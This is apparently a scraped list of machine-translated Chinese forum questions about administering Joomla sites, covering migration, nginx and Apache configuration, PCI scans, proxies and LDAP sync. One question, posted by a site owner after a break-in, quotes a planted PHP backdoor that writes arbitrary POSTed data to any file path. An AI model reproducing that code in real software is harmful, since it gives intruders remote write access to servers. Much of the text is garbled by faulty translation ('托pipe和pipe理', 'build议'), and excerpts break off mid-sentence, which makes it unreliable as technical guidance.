Articles of joomla

移动Joomla的网站

出于某些精神病的原因,我已经接pipe了一个非盈利的Joomla网站的托pipe和pipe理工作。 不幸的是,前pipe理员不合作,所以我是盲目的。 我也有Joomla几乎没有经验,natch。 我得到了一个组织的董事会成员的技术精明的tarball,但我不知道如何去安装它 – 简单地解压缩到适当的目录会产生一个“数据库错误:无法连接到数据库:无法连接到MySQL“加载网站的错误。 根据Joomla文档,这个错误有三个原因: "1) Sometimes you will see this message if MySQL has stopped running on your server. Your server administrator may temporarily turn MySQL off to run maintenance utilities. In such circumstances, your site will likely return shortly. 2) Your database user has been deleted. If this is the case, […]

pci扫描失败

PCI扫描报告下面的问题为我的Joomla网站。 “可以从远程Web服务器检索文件备份” 我通过访问http://site.com/component/user/~手动检查 基本上,访问http://site.com/component/user/~不会抛出404错误 我想抛出404错误或redirect到主页,而访问任何目录使用〜 所以我所尝试的是在我的.htaccess添加下面的行 RewriteCond %{REQUEST_URI} ![~]$ [NC] 但是这不起作用。 任何Joomla专家可以请告知,如果有任何其他方式来解决这个问题,或者如果上述命令是正确的,究竟应该放置在哪里。 我试过把它放在根目录下,在/joomla/components/mod_user目录下。

使用nginx获取**一些** Joomla页面上的404

Joomla 2.5,PHP 5.3.3(fpm-fcgi),nginx 1.4.2 Nginx正在运行,我可以访问我的网站的主页和其他网站的URL结束index.php就好了。 但是,当我浏览到一个Joomla类别的URL的forms是: http : //www.mysite.com/index.php/features/modules我总是得到一个404。 文章似乎也很好(formshttp://www.mysite.com/index.php?Itemid=404 )它似乎是“index.php”不涉及的类别。 任何人都可以build议我需要添加到我的nginx conf来解决这个问题吗? 谢谢, 史蒂夫

反向SSL代理:在NGINX和Joomla前面的NGINX

我的问题类似于这个 ,除了我有另一个nginx服务器后面的nginx SSL代理服务器: ————————– ——————————– ———- | nginx: https://bla.com | —–> | nginx: http://localhost:8080 | —-> | Joomla | ————————– ——————————– ———- 在nginx中是否有类似SetEnvIfNoCase X-Forwarded-Proto https HTTPS=on的选项? 目前,我有问题,静态内容,如JavaScript和CSS文件不服务。 前端nginx代理上的configuration: server { listen 443; listen [::]:443 ipv6only=on; server_name bla.com; // cut ssl settings location / { proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto […]

Apache 99%的CPU,但没有访问日志

我有一个运行Apache / Joomla的服务器。 不时(在一个合理的定期基础上),100%的CPU引脚,但没有发生访问日志。 任何想法如何找出问题是什么? top – 11:31:48 up 30 days, 20:00, 1 user, load average: 1.06, 1.07, 0.96 Tasks: 115 total, 2 running, 113 sleeping, 0 stopped, 0 zombie Cpu(s): 4.6%us, 19.8%sy, 0.0%ni, 74.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.8%st Mem: 536684k total, 493960k used, 42724k free, 2456k buffers Swap: 1048568k total, 598532k used, 450036k free, […]

不断有人正在索引index.xml

我的服务器最近由于Joomla和allow_url_fopen = ON而受到了攻击。我在服务器的根目录中看到有这个内容的各种php文件 Restricted accoss <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); $file = "".$_POST["path"]; $fh = fopen ($file, 'w') or die(""); echo fwrite ($fh, stripslashes($_POST["raw_data"])); fclose($fh); 所以我closures了allow_url_fopen并删除了所有这些文件。 现在,我的网站在几分钟内运行正常,但是它会每隔几秒钟向这个地址发出请求,并在error_log中给出这个消息 [Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml 这我在access_log中看到很多时间 74.125.179.86 – – [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 […]

阿帕奇重载

我有一个标准的Centos 6.2安装,运行LAMP。 build立使用http://www.howtoforge.com/perfect-server-centos-6.2-x86_64-with-apache2-ispconfig-3-p2没有ISPconfig部分。 构build在ESX4.1的虚拟机上,100GB硬盘40Gb RAM Apache的负载总是占用CPU,我们的网站是基于Joomla,并具有很大的dynamic内容。 任何人都可以build议在Apache中的最佳设置,使其运行更好。

如何使用joomla的Squid(代理和反向代理)

我想要一些joomla性能的优化技巧我用memcache,但我现在不用如何使用代理和反向代理()与joomla请帮助谢谢

与多个CMS共享主机

任何关于如何实现与多个CMS共享虚拟主机群集的build议? 在我们的例子中,我们有2个Web服务器连接到共享存储。 如果我们想要托pipeWordpress,Drupal和Joomla网站,那么为每个CMS分别安装一个集群还是可以将它们全部安装在同一个共享卷上,让2个Web服务器(运行Apache)负责提供页面,而不pipe使用哪个CMS来创build它们?

我如何将用户从ldap同步到joomla?

我有与桑巴和OpenLDAP的Linux服务器。 我需要将用户数据从openldap同步到joomla。 有什么build议么?